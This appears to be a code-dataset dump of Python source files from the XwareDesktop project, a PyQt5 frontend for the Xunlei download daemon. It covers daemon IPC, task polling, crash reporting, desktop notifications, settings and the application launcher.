@pyqtProperty(int, notify = updated)\n def autoOpenVip(self):\n return self._settings.autoOpenVip\n\n @pyqtProperty(int, notify = updated)\n def autoDlSubtitle(self):\n return self._settings.autoDlSubtitle\n\n def update(self, settings: Settings):\n self._settings = settings\n self.updated.emit()\n\n\nclass XwareAdapter(QObject):\n update = pyqtSignal(int, list)\n\n def __init__(self, clientOptions):\n super().__init__()\n self._mapIds = None\n self._ulSpeed = 0\n self._dlSpeed = 0\n self._xwareSettings = XwareSettings(self)\n self._loop = asyncio.get_event_loop()\n self._uuid = uuid.uuid1().hex\n self._xwareClient = XwareClient(clientOptions)\n\n @property\n def namespace(self):\n return \"xware-\" + self._uuid\n\n @property\n def ulSpeed(self):\n return self._ulSpeed\n\n @ulSpeed.setter\n def ulSpeed(self, value):\n if value != self._ulSpeed:\n self._ulSpeed = value\n app.adapterManager.ulSpeedChanged.emit()\n\n @property\n def dlSpeed(self):\n return self._dlSpeed\n\n @dlSpeed.setter\n def dlSpeed(self, value):\n if value != self._dlSpeed:\n self._dlSpeed = value\n app.adapterManager.dlSpeedChanged.emit()\n\n @property\n def backendSettings(self):\n return self._xwareSettings\n\n def updateOptions(self, clientOptions):\n self._xwareClient.updateOptions(clientOptions)\n\n # =========================== PUBLIC ===========================\n @asyncio.coroutine\n def main(self):\n # Entry point of the thread \"XwareAdapterEventLoop\"\n # main() handles non-stop polling\n\n runningId = yield from app.taskModel.taskManager.appendMap(\n Tasks(self, TaskClass.RUNNING))\n completedId = yield from app.taskModel.taskManager.appendMap(\n Tasks(self, TaskClass.COMPLETED))\n recycledId = yield from app.taskModel.taskManager.appendMap(\n Tasks(self, TaskClass.RECYCLED))\n failedOnSubmissionId = yield from app.taskModel.taskManager.appendMap(\n Tasks(self, TaskClass.FAILED_ON_SUBMISSION))\n self._mapIds = (runningId, completedId, recycledId, failedOnSubmissionId)\n\n while True:\n self._loop.call_soon(self.get_getsysinfo)\n self._loop.call_soon(self.get_list, TaskClass.RUNNING)\n self._loop.call_soon(self.get_list, TaskClass.COMPLETED)\n self._loop.call_soon(self.get_list, TaskClass.RECYCLED)\n self._loop.call_soon(self.get_list, TaskClass.FAILED_ON_SUBMISSION)\n self._loop.call_soon(self.get_settings)\n\n yield from asyncio.sleep(_POLLING_INTERVAL)\n\n # =========================== META-PROGRAMMING MAGICS ===========================\n def __getattr__(self, name):\n if name.startswith(\"get_\") or name.startswith(\"post_\"):\n def method(*args):\n clientMethod = getattr(self._xwareClient, name)(*args)\n clientMethod = asyncio.async(clientMethod)\n\n donecb = getattr(self, \"_donecb_\" + name, None)\n if donecb:\n curried = partial(donecb, *args)\n clientMethod.add_done_callback(curried)\n setattr(self, name, method)\n return method\n raise AttributeError(\"XwareAdapter doesn't have a {name}.\".format(**locals()))\n\n def _donecb_get_getsysinfo(self, future):\n pass\n\n def _donecb_get_list(self, klass, future):\n result = future.result()\n\n if klass == TaskClass.RUNNING:\n self.ulSpeed = result[\"upSpeed\"]\n self.dlSpeed = result[\"dlSpeed\"]\n mapId = self._mapIds[int(klass)]\n self.update.emit(mapId, result[\"tasks\"])\n\n def _donecb_get_settings(self, future):\n result = future.result()\n self._xwareSettings.update(result)\n\n def do_pauseTasks(self, tasks, options):\n taskIds = map(lambda t: t.realid, tasks)\n self._loop.call_soon_threadsafe(self.post_pause, taskIds)\n\n def do_startTasks(self, tasks, options):\n taskIds = map(lambda t: t.realid, tasks)\n self._loop.call_soon_threadsafe(self.post_start, taskIds)\n\n def do_openLixianChannel(self, taskItem, enable: bool):\n taskId = taskItem.realid\n self._loop.call_soon_threadsafe(self.post_openLixianChannel, taskId, enable)\n\n def do_openVipChannel(self, taskItem):\n taskId = taskItem.realid\n self._loop.call_soon_threadsafe(self.post_openVipChannel, taskId)\n\n\nclass XwareAdapterThread(threading.Thread):\n def __init__(self, options):\n super().__init__(name = \"XwareAdapterEventLoop\", daemon = True)\n self._loop = None\n self._loop_executor = None\n self._adapter = None\n self._options = options\n\n def run(self):\n self._loop = asyncio.new_event_loop()\n self._loop.set_debug(True)\n self._loop_executor = ThreadPoolExecutor(max_workers = 1)\n self._loop.set_default_executor(self._loop_executor)\n asyncio.events.set_event_loop(self._loop)\n\n self._adapter = XwareAdapter(self._options)\n app.adapterManager.registerAdapter(self._adapter)\n asyncio.async(self._adapter.main())\n self._loop.run_forever()\n"
},
{
"alpha_fraction": 0.6147485375404358,
"alphanum_fraction": 0.6154263019561768,
"avg_line_length": 28.987804412841797,
"blob_id": "2e26a68786edcfaebf3d08a096b358ed11809a63",
"content_id": "7bed8003f3329643cf6652cc4f9ab744c2518e73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7377,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 246,
"path": "/src/frontend/xwaredpy.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot, pyqtProperty\n\nimport threading, time\nimport os\nfrom utils.misc import tryRemove, trySymlink, tryMkdir\nfrom utils.system import getInitType, InitType\nimport constants\n\nfrom multiprocessing.connection import Client\n\n\nclass _XwaredCommunicationClient(object):\n funcName = None\n args = tuple()\n kwargs = dict()\n sent = False\n conn = None\n response = None\n received = False\n\n def __init__(self):\n self.conn = Client(*constants.XWARED_SOCKET)\n\n def send(self):\n if not self.funcName:\n raise ValueError(\"no funcName\")\n self.conn.send([self.funcName, self.args, self.kwargs])\n self.sent = True\n self.response = self.conn.recv()\n self.received = True\n self.conn.close()\n\n def setFunc(self, funcName):\n if self.sent:\n raise Exception(\"sent already.\")\n self.funcName = funcName\n\n def setArgs(self, args):\n if self.sent:\n raise Exception(\"sent already.\")\n self.args = args\n\n def setKwargs(self, kwargs):\n if self.sent:\n raise Exception(\"sent already.\")\n self.kwargs = kwargs\n\n def getReturnValue(self):\n if not self.sent:\n raise Exception(\"not sent yet.\")\n if not self.received:\n raise Exception(\"not received yet.\")\n return self.response\n\n\nclass InvalidSocket(FileNotFoundError, ConnectionRefusedError):\n pass\n\n\ndef callXwaredInterface(funcName, *args, **kwargs):\n try:\n client = _XwaredCommunicationClient()\n except (FileNotFoundError, ConnectionRefusedError) as e:\n logging.error(\"XwaredInterface InvalidSocket with method {}\".format(funcName))\n raise InvalidSocket(e)\n\n client.setFunc(funcName)\n if args:\n client.setArgs(args)\n if kwargs:\n client.setKwargs(kwargs)\n client.send()\n result = client.getReturnValue()\n logging.info(\"{funcName} -> {result}\".format(**locals()))\n del client\n return result\n\n\n# an interface to watch, notify, and supervise the status of xwared and ETM\nclass XwaredPy(QObject):\n statusUpdated = pyqtSignal()\n\n _etmStatus = None\n _xwaredStatus = None\n _userId = None\n _peerId = None\n _lcPort = None\n\n _t = None\n\n def __init__(self, parent):\n super().__init__(parent)\n\n app.aboutToQuit.connect(self.stopXware)\n self.startXware()\n self._t = threading.Thread(target = self._watcherThread, daemon = True,\n name = \"xwared/etm watch thread\")\n self._t.start()\n app.sigMainWinLoaded.connect(self.connectUI)\n\n @pyqtProperty(bool, notify = statusUpdated)\n def etmStatus(self):\n return self._etmStatus\n\n @pyqtProperty(bool, notify = statusUpdated)\n def xwaredStatus(self):\n return self._xwaredStatus\n\n @pyqtProperty(str, notify = statusUpdated)\n def userId(self):\n return self._userId\n\n @pyqtProperty(str, notify = statusUpdated)\n def peerId(self):\n return self._peerId\n\n @pyqtProperty(int, notify = statusUpdated)\n def lcPort(self):\n return self._lcPort\n\n def _statusUpdate(self, etmStatus, xwaredStatus, userId, peerId, lcPort):\n self._etmStatus = etmStatus\n self._xwaredStatus = xwaredStatus\n self._userId = userId\n self._peerId = peerId\n self._lcPort = lcPort\n self.statusUpdated.emit()\n\n @pyqtSlot()\n def connectUI(self):\n # Note: The menu actions enable/disable toggling are handled by statusbar.\n app.mainWin.action_ETMstart.triggered.connect(self.slotStartETM)\n app.mainWin.action_ETMstop.triggered.connect(self.slotStopETM)\n app.mainWin.action_ETMrestart.triggered.connect(self.slotRestartETM)\n\n @staticmethod\n def startXware():\n try:\n callXwaredInterface(\"start\")\n except InvalidSocket:\n pass\n\n @staticmethod\n def stopXware():\n try:\n callXwaredInterface(\"quit\")\n except InvalidSocket:\n pass\n\n @property\n def startEtmWhen(self):\n # return None if cannot get the value\n try:\n return callXwaredInterface(\"getStartEtmWhen\")\n except InvalidSocket:\n return None\n\n @startEtmWhen.setter\n def startEtmWhen(self, value):\n callXwaredInterface(\"setStartEtmWhen\", value)\n\n def _watcherThread(self):\n while True:\n try:\n backendInfo = callXwaredInterface(\"infoPoll\")\n self._statusUpdate(etmStatus = True if backendInfo.etmPid else False,\n xwaredStatus = True,\n userId = backendInfo.userId,\n peerId = backendInfo.peerId,\n lcPort = backendInfo.lcPort)\n except InvalidSocket:\n self._statusUpdate(etmStatus = False,\n xwaredStatus = False,\n userId = 0,\n peerId = \"\",\n lcPort = 0)\n\n time.sleep(1)\n\n @pyqtSlot()\n def slotStartETM(self):\n callXwaredInterface(\"startETM\")\n\n @pyqtSlot()\n def slotStopETM(self):\n callXwaredInterface(\"stopETM\")\n\n @pyqtSlot()\n def slotRestartETM(self):\n callXwaredInterface(\"restartETM\")\n\n @property\n def managedBySystemd(self):\n return os.path.lexists(constants.SYSTEMD_SERVICE_ENABLED_USERFILE) and \\\n os.path.lexists(constants.SYSTEMD_SERVICE_USERFILE)\n\n @managedBySystemd.setter\n def managedBySystemd(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.SYSTEMD_SERVICE_ENABLED_USERFILE))\n\n trySymlink(constants.SYSTEMD_SERVICE_FILE,\n constants.SYSTEMD_SERVICE_USERFILE)\n\n trySymlink(constants.SYSTEMD_SERVICE_USERFILE,\n constants.SYSTEMD_SERVICE_ENABLED_USERFILE)\n else:\n tryRemove(constants.SYSTEMD_SERVICE_ENABLED_USERFILE)\n tryRemove(constants.SYSTEMD_SERVICE_USERFILE)\n if getInitType() == InitType.SYSTEMD:\n os.system(\"systemctl --user daemon-reload\")\n\n @property\n def managedByUpstart(self):\n return os.path.lexists(constants.UPSTART_SERVICE_USERFILE)\n\n @managedByUpstart.setter\n def managedByUpstart(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.UPSTART_SERVICE_USERFILE))\n\n trySymlink(constants.UPSTART_SERVICE_FILE,\n constants.UPSTART_SERVICE_USERFILE)\n else:\n tryRemove(constants.UPSTART_SERVICE_USERFILE)\n if getInitType() == InitType.UPSTART:\n os.system(\"initctl --user reload-configuration\")\n\n @property\n def managedByAutostart(self):\n return os.path.lexists(constants.AUTOSTART_DESKTOP_USERFILE)\n\n @managedByAutostart.setter\n def managedByAutostart(self, on):\n if on:\n tryMkdir(os.path.dirname(constants.AUTOSTART_DESKTOP_USERFILE))\n\n trySymlink(constants.AUTOSTART_DESKTOP_FILE,\n constants.AUTOSTART_DESKTOP_USERFILE)\n else:\n tryRemove(constants.AUTOSTART_DESKTOP_USERFILE)\n"
},
{
"alpha_fraction": 0.5727181434631348,
"alphanum_fraction": 0.5797392129898071,
"avg_line_length": 27.485713958740234,
"blob_id": "4ce6e0a2cbd47cb6b3ee3e9a9af01ad731e735a3",
"content_id": "6b5b08253db988777767b81dbcbe11e9e30dd07c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 997,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 35,
"path": "/src/frontend/CrashReport/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\n\nimport os, threading\nimport pickle, binascii\n\n\nclass CrashReport(object):\n def __init__(self, tb):\n super().__init__()\n payload = dict(traceback = tb,\n thread = threading.current_thread().name)\n pid = os.fork()\n if pid == 0:\n # child\n cmd = (os.path.join(os.path.dirname(__file__), \"CrashReportApp.py\"),\n self.encodePayload(payload))\n os.execv(cmd[0], cmd)\n else:\n pass\n\n @staticmethod\n def encodePayload(payload):\n pickled = pickle.dumps(payload, 3) # protocol 3 requires Py3.0\n pickledBytes = binascii.hexlify(pickled)\n pickledStr = pickledBytes.decode(\"ascii\")\n return pickledStr\n\n @staticmethod\n def decodePayload(payload):\n pickledBytes = payload.encode(\"ascii\")\n pickled = binascii.unhexlify(pickledBytes)\n unpickled = pickle.loads(pickled)\n return unpickled\n"
},
{
"alpha_fraction": 0.6546977758407593,
"alphanum_fraction": 0.6594853401184082,
"avg_line_length": 28.3157901763916,
"blob_id": "39f38bf5804fcddb9709f121f754a21a17d70d45",
"content_id": "8eabc0c59dbff47629634766c137c881903da6d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1671,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 57,
"path": "/src/frontend/CrashReport/CrashAwareThreading.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Providing the utilities that make python threads know what to do when unhandled exceptions occur.\n# Typically opening the CrashReportApp and doing its stuff.\n# This is a workaround against the python bug: http://bugs.python.org/issue1230540\n\n# For the Main thread, just call installCrashReport()\n# For other non-running-yet threads, just call installThreadExceptionHandler()\n\nimport threading, traceback, sys, os\nfrom CrashReport import CrashReport\n\n\nclass _PatchedThread(threading.Thread):\n def start(self):\n self._unpatched_run = self.run\n self.run = self.new_run\n super().start()\n\n def new_run(self):\n try:\n # super().run()\n self._unpatched_run()\n except KeyboardInterrupt:\n pass\n except:\n sys.excepthook(*sys.exc_info())\n\n\ndef installThreadExceptionHandler():\n threading.Thread = _PatchedThread\n\n\ndef __installForReal():\n def __reportCrash(etype, value, tb):\n sys.__excepthook__(etype, value, tb)\n\n formatted = \"\".join(traceback.format_exception(etype, value, tb))\n\n CrashReport(formatted)\n\n if threading.current_thread() == threading.main_thread():\n sys.exit(os.EX_SOFTWARE) # Make sure MainThread exceptions also causes app termination.\n else:\n os._exit(os.EX_SOFTWARE)\n\n sys.excepthook = __reportCrash\n\n\ndef installCrashReport():\n thread = threading.current_thread()\n\n if not getattr(thread, \"IsCrashAware\", False):\n __installForReal()\n thread.IsCrashAware = True\n else:\n print(\"Already installed crash report on thread '{}'.\".format(thread.name))\n"
},
{
"alpha_fraction": 0.5783957242965698,
"alphanum_fraction": 0.581390380859375,
"avg_line_length": 36.10317611694336,
"blob_id": "9e2519e6fd6f4fad57fef3cc8446166fef0359d4",
"content_id": "03f17fd742a16f8460cf5498b3edd9eec42ae999",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4697,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 126,
"path": "/src/frontend/Notify/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSlot, QMetaType, QUrl\nfrom PyQt5.QtDBus import QDBusConnection, QDBusInterface, QDBusArgument, QDBusMessage\nfrom PyQt5.QtGui import QDesktopServices\nfrom PyQt5.QtMultimedia import QSound\n\nimport os\n\n_DBUS_NOTIFY_SERVICE = \"org.freedesktop.Notifications\"\n_DBUS_NOTIFY_PATH = \"/org/freedesktop/Notifications\"\n_DBUS_NOTIFY_INTERFACE = \"org.freedesktop.Notifications\"\n\n\nclass Notifier(QObject):\n _conn = None\n _interface = None\n _notifications = None # a dict of notifyId: taskDict\n _capabilities = None\n _completedTasksStat = None\n\n def __init__(self, parent):\n super().__init__(parent)\n self._conn = QDBusConnection(\"Xware Desktop\").sessionBus()\n\n self._interface = QDBusInterface(_DBUS_NOTIFY_SERVICE,\n _DBUS_NOTIFY_PATH,\n _DBUS_NOTIFY_INTERFACE,\n self._conn)\n\n self._notifications = {}\n self._completedTasksStat = app.etmpy.completedTasksStat\n self._completedTasksStat.sigTaskCompleted.connect(self.notifyTask)\n\n self._capabilities = self._getCapabilities()\n if \"actions\" in self._capabilities:\n successful = self._conn.connect(_DBUS_NOTIFY_SERVICE,\n _DBUS_NOTIFY_PATH,\n _DBUS_NOTIFY_INTERFACE,\n \"ActionInvoked\", self.slotActionInvoked)\n if not successful:\n logging.error(\"ActionInvoked connect failed.\")\n\n self._qSound_complete = QSound(\":/sound/download-complete.wav\", self)\n\n @property\n def isConnected(self):\n return self._conn.isConnected()\n\n def notifyTask(self, taskId):\n task = self._completedTasksStat.getTask(taskId)\n\n if task.get(\"state\", None) == 11: # see definitions in class TaskStatistic.\n if app.settings.getbool(\"frontend\", \"notifybysound\"):\n self._qSound_complete.play()\n self._dbus_notify(task)\n else:\n # TODO: Also notify if errors occur\n pass\n\n def _getCapabilities(self):\n # get libnotify server caps and remember it.\n qdBusMsg = self._interface.call(\n \"GetCapabilities\"\n )\n if qdBusMsg.errorName():\n logging.error(\"cannot get org.freedesktop.Notifications.GetCapabilities\")\n return []\n else:\n return qdBusMsg.arguments()[0]\n\n def _dbus_notify(self, task):\n if not app.settings.getbool(\"frontend\", \"popnotifications\"):\n return\n\n if \"actions\" in self._capabilities:\n actions = QDBusArgument([\"open\", \"打开\", \"openDir\", \"打开文件夹\"], QMetaType.QStringList)\n else:\n actions = QDBusArgument([], QMetaType.QStringList)\n\n qdBusMsg = self._interface.call(\n \"Notify\",\n QDBusArgument(\"Xware Desktop\", QMetaType.QString), # app_name\n QDBusArgument(0, QMetaType.UInt), # replace_id\n QDBusArgument(\"xware-desktop\", QMetaType.QString), # app_icon\n QDBusArgument(\"下载完成\", QMetaType.QString), # summary\n QDBusArgument(task[\"name\"], QMetaType.QString), # body\n actions,\n {\n \"category\": \"transfer.complete\",\n }, # hints\n QDBusArgument(5000, QMetaType.Int), # timeout\n )\n\n if qdBusMsg.errorName():\n logging.error(\"DBus, notifyTask {}: {}\".format(qdBusMsg.errorName(),\n qdBusMsg.errorMessage()))\n else:\n # add it to the dict\n self._notifications[qdBusMsg.arguments()[0]] = task\n\n @pyqtSlot(QDBusMessage)\n def slotActionInvoked(self, msg):\n notifyId, action = msg.arguments()\n task = self._notifications.get(notifyId, None)\n if not task:\n # other applications' notifications\n return\n name = task[\"name\"] # filename\n path = task[\"path\"] # location\n\n if action == \"open\":\n openPath = os.path.join(path, name)\n elif action == \"openDir\":\n openPath = path\n elif action == \"default\": # Unity's notify osd always have a default action.\n return\n else:\n raise Exception(\"Unknown action from slotActionInvoked: {}.\".format(action))\n\n localOpenPath = app.mountsFaker.convertToLocalPath(openPath)\n qUrl = QUrl.fromLocalFile(localOpenPath)\n QDesktopServices().openUrl(qUrl)\n"
},
{
"alpha_fraction": 0.6210423707962036,
"alphanum_fraction": 0.6259133219718933,
"avg_line_length": 32.655738830566406,
"blob_id": "ff8f731b2ad6af432c029726dc77763c72455507",
"content_id": "4fd3e04929a6a8685b159115764b617710ea4681",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2053,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 61,
"path": "/src/shared/config.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\n\nimport configparser, pickle, binascii\n\n\nclass SettingsAccessorBase(object):\n def __init__(self, configFilePath, defaultDict, **kwargs):\n super().__init__()\n self.config = configparser.ConfigParser()\n self._configFilePath = configFilePath\n self._defaultDict = defaultDict\n self.config.read(self._configFilePath)\n\n def has(self, section, key):\n return self.config.has_option(section, key)\n\n def get(self, section, key):\n return self.config.get(section, key, fallback = self._defaultDict[section][key])\n\n def set(self, section, key, value):\n try:\n self.config.set(section, key, value)\n except configparser.NoSectionError:\n self.config.add_section(section)\n self.config.set(section, key, value)\n\n def getint(self, section, key):\n return int(self.get(section, key))\n\n def setint(self, section, key, value):\n assert type(value) is int\n self.set(section, key, str(value))\n\n def getbool(self, section, key):\n return True if self.get(section, key) in (\"1\", True) else False\n\n def setbool(self, section, key, value):\n assert type(value) is bool\n self.set(section, key, \"1\" if value else \"0\")\n\n def getobj(self, section, key):\n pickledStr = self.get(section, key)\n if type(pickledStr) is str and len(pickledStr) > 0:\n pickledBytes = pickledStr.encode(\"ascii\")\n pickled = binascii.unhexlify(pickledBytes)\n unpickled = pickle.loads(pickled)\n return unpickled\n else:\n return pickledStr\n\n def setobj(self, section, key, value):\n pickled = pickle.dumps(value, 3) # protocol 3 requires Py3.0\n pickledBytes = binascii.hexlify(pickled)\n pickledStr = pickledBytes.decode(\"ascii\")\n self.set(section, key, pickledStr)\n\n def save(self):\n with open(self._configFilePath, 'w', encoding = \"UTF-8\") as configfile:\n self.config.write(configfile)\n"
},
{
"alpha_fraction": 0.5625957250595093,
"alphanum_fraction": 0.5706726312637329,
"avg_line_length": 33.19523620605469,
"blob_id": "ec071974315d181850219dbc2cadd4aa495be1cf",
"content_id": "4109f4708b0924fab15c2d0c42d9671905c3c092",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7451,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 210,
"path": "/src/frontend/launcher.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os, sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../\"))\n\nif __name__ == \"__main__\":\n import faulthandler, logging\n from logging import handlers\n from utils import misc\n misc.tryMkdir(os.path.expanduser(\"~/.xware-desktop\"))\n\n loggingHandler = logging.handlers.RotatingFileHandler(\n os.path.expanduser(\"~/.xware-desktop/log.txt\"),\n maxBytes = 1024 * 1024 * 5,\n backupCount = 5)\n logging.basicConfig(handlers = (loggingHandler,),\n format = \"%(asctime)s %(levelname)s:%(name)s:%(message)s\")\n\n faultLogFd = open(os.path.expanduser('~/.xware-desktop/frontend.fault.log'), 'a')\n faulthandler.enable(faultLogFd)\n\n from CrashReport import CrashAwareThreading\n CrashAwareThreading.installCrashReport()\n CrashAwareThreading.installThreadExceptionHandler()\n\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal\nfrom PyQt5.QtWidgets import QApplication\n\nimport fcntl\n\nfrom shared import __version__\n\nimport constants\n__all__ = ['app']\n\n\nclass XwareDesktop(QApplication):\n mainWin = None\n monitorWin = None\n sigMainWinLoaded = pyqtSignal()\n\n def __init__(self, *args):\n super().__init__(*args)\n\n import main\n from Settings import SettingsAccessor, DEFAULT_SETTINGS\n from xwaredpy import XwaredPy\n from etmpy import EtmPy\n from systray import Systray\n import mounts\n from Notify import Notifier\n from frontendpy import FrontendPy\n from Schedule import Scheduler\n\n logging.info(\"XWARE DESKTOP STARTS\")\n self.setApplicationName(\"XwareDesktop\")\n self.setApplicationVersion(__version__)\n\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n self.checkOneInstance()\n\n self.settings = SettingsAccessor(self,\n configFilePath = constants.CONFIG_FILE,\n defaultDict = DEFAULT_SETTINGS)\n\n # components\n self.xwaredpy = XwaredPy(self)\n self.etmpy = EtmPy(self)\n self.mountsFaker = mounts.MountsFaker()\n self.dbusNotify = Notifier(self)\n self.frontendpy = FrontendPy(self)\n self.scheduler = Scheduler(self)\n\n self.settings.applySettings.connect(self.slotCreateCloseMonitorWindow)\n\n self.mainWin = main.MainWindow(None)\n self.mainWin.show()\n self.sigMainWinLoaded.emit()\n\n self.systray = Systray(self)\n\n self.settings.applySettings.emit()\n\n if self.settings.get(\"internal\", \"previousversion\") == \"0.8\":\n # upgraded or fresh installed\n from PyQt5.QtCore import QUrl\n from PyQt5.QtGui import QDesktopServices\n QDesktopServices.openUrl(QUrl(\"https://github.com/Xinkai/XwareDesktop/wiki/使用说明\"))\n\n self.settings.set(\"internal\", \"previousversion\", __version__)\n\n @staticmethod\n def checkOneInstance():\n fd = os.open(constants.FRONTEND_LOCK, os.O_RDWR | os.O_CREAT)\n\n try:\n fcntl.flock(fd, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except BlockingIOError:\n def showStartErrorAndExit():\n from PyQt5.QtWidgets import QMessageBox\n QMessageBox.warning(None, \"Xware Desktop 启动失败\",\n \"Xware Desktop已经运行,或其没有正常退出。\\n\"\n \"请检查:\\n\"\n \" 1. 没有Xware Desktop正在运行\\n\"\n \" 2. 上次运行的Xware Desktop没有残留\"\n \"(使用进程管理器查看名为python3或xware-desktop或launcher.py的进程)\\n\",\n QMessageBox.Ok, QMessageBox.Ok)\n sys.exit(-1)\n\n tasks = sys.argv[1:]\n if len(tasks) == 0:\n showStartErrorAndExit()\n else:\n from Tasks import CommandlineClient\n try:\n CommandlineClient(tasks)\n except FileNotFoundError:\n showStartErrorAndExit()\n except ConnectionRefusedError:\n showStartErrorAndExit()\n sys.exit(0)\n\n @pyqtSlot()\n def slotCreateCloseMonitorWindow(self):\n logging.debug(\"slotCreateCloseMonitorWindow\")\n show = self.settings.getbool(\"frontend\", \"showmonitorwindow\")\n import monitor\n if show:\n if self.monitorWin:\n pass # already shown, do nothing\n else:\n self.monitorWin = monitor.MonitorWindow(None)\n self.monitorWin.show()\n else:\n if self.monitorWin:\n logging.debug(\"close monitorwin\")\n self.monitorWin.close()\n del self.monitorWin\n self.monitorWin = None\n else:\n pass # not shown, do nothing\n\n @property\n def autoStart(self):\n return os.path.lexists(constants.DESKTOP_AUTOSTART_FILE)\n\n @autoStart.setter\n def autoStart(self, on):\n if on:\n # mkdir if autostart dir doesn't exist\n misc.tryMkdir(os.path.dirname(constants.DESKTOP_AUTOSTART_FILE))\n\n misc.trySymlink(constants.DESKTOP_FILE,\n constants.DESKTOP_AUTOSTART_FILE)\n else:\n misc.tryRemove(constants.DESKTOP_AUTOSTART_FILE)\n\n\ndef doQtIntegrityCheck():\n if os.path.lexists(\"/usr/bin/qt.conf\"):\n # Detect 115wangpan, see #80\n import tkinter as tk\n import tkinter.ttk as ttk\n\n class QtIntegrityAlert(ttk.Frame):\n def __init__(self, master):\n super().__init__(master)\n self.pack(expand = True)\n\n url = \"http://www.ubuntukylin.com/ukylin/forum.php?mod=viewthread&tid=9508\"\n self.mainText = ttk.Label(\n self,\n font=(\"Sans Serif\", 12),\n text = \"\"\"检测到系统中可能安装了115网盘。它会导致Xware Desktop和其它的基于Qt的程序无法使用。请\n\n* 卸载115网盘 或\n* 按照{url}的方法解决此问题\n\"\"\".format(url = url))\n self.mainText.pack(side = \"top\", fill = \"both\", expand = True, padx = 20,\n pady = (25, 0))\n\n self.viewThreadBtn = ttk.Button(\n self,\n text = \"我要保留115网盘,查看解决方法\",\n command = lambda: os.system(\"xdg-open '{}'\".format(url)))\n self.viewThreadBtn.pack(side = \"bottom\", fill = \"none\", expand = True, pady = 10)\n\n self.closeBtn = ttk.Button(\n self,\n text = \"我要卸载115网盘,关闭这个窗口\",\n command = lambda: root.destroy())\n self.closeBtn.pack(side = \"bottom\", fill = \"none\", expand = True, pady = 10)\n\n root = tk.Tk()\n root.title(\"Xware Desktop 提示\")\n tkapp = QtIntegrityAlert(master = root)\n sys.exit(tkapp.mainloop())\n\n\napp = None\nif __name__ == \"__main__\":\n doQtIntegrityCheck()\n\n from shared.profile import profileBootstrap\n profileBootstrap(constants.PROFILE_DIR)\n app = XwareDesktop(sys.argv)\n sys.exit(app.exec())\nelse:\n app = QApplication.instance()\n"
},
{
"alpha_fraction": 0.6688470840454102,
"alphanum_fraction": 0.6721177697181702,
"avg_line_length": 42.67856979370117,
"blob_id": "a3eb1bdbe98c7f032da12e0a2955012b5e565a35",
"content_id": "fb3b3b8fd12006e88d321eb412b3c1e0d0eca951",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1223,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 28,
"path": "/src/frontend/constants.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom shared.constants import *\n\nFRONTEND_DIR = os.path.join(BASE_DIR, \"frontend\")\n\nLOGIN_PAGE = \"http://yuancheng.xunlei.com/login.html\"\nV2_PAGE = \"http://yuancheng.xunlei.com/\"\nV3_PAGE = \"http://yuancheng.xunlei.com/3/\"\n\nXWAREJS_FILE = os.path.join(FRONTEND_DIR, \"xwarejs.js\")\nXWARESTYLE_FILE = os.path.join(FRONTEND_DIR, \"style.css\")\n\nSYSTEMD_SERVICE_FILE = os.path.join(FRONTEND_DIR, \"xwared.service\")\nSYSTEMD_SERVICE_USERFILE = os.path.join(XDG_CONFIG_HOME, \"systemd/user/xwared.service\")\nSYSTEMD_SERVICE_ENABLED_USERFILE = os.path.join(XDG_CONFIG_HOME,\n \"systemd/user/default.target.wants/xwared.service\")\n\nUPSTART_SERVICE_FILE = os.path.join(FRONTEND_DIR, \"xwared.conf\")\nUPSTART_SERVICE_USERFILE = os.path.join(XDG_CONFIG_HOME,\n \"upstart/xwared.conf\")\n\nAUTOSTART_DESKTOP_FILE = os.path.join(FRONTEND_DIR, \"xwared.desktop\")\nAUTOSTART_DESKTOP_USERFILE = os.path.join(XDG_CONFIG_HOME,\n \"autostart/xwared.desktop\")\n\nDESKTOP_FILE = \"/usr/share/applications/xware-desktop.desktop\"\nDESKTOP_AUTOSTART_FILE = os.path.join(XDG_CONFIG_HOME, \"autostart/xware-desktop.desktop\")\n"
},
{
"alpha_fraction": 0.6639785170555115,
"alphanum_fraction": 0.6678885817527771,
"avg_line_length": 34.27586364746094,
"blob_id": "9f2f0a40b2415ea53ad7c42d70df012c59a64f89",
"content_id": "a54098b264a4cead73274d78ceef40554bb898a6",
"detected_licenses": [],
"is_generated": false,
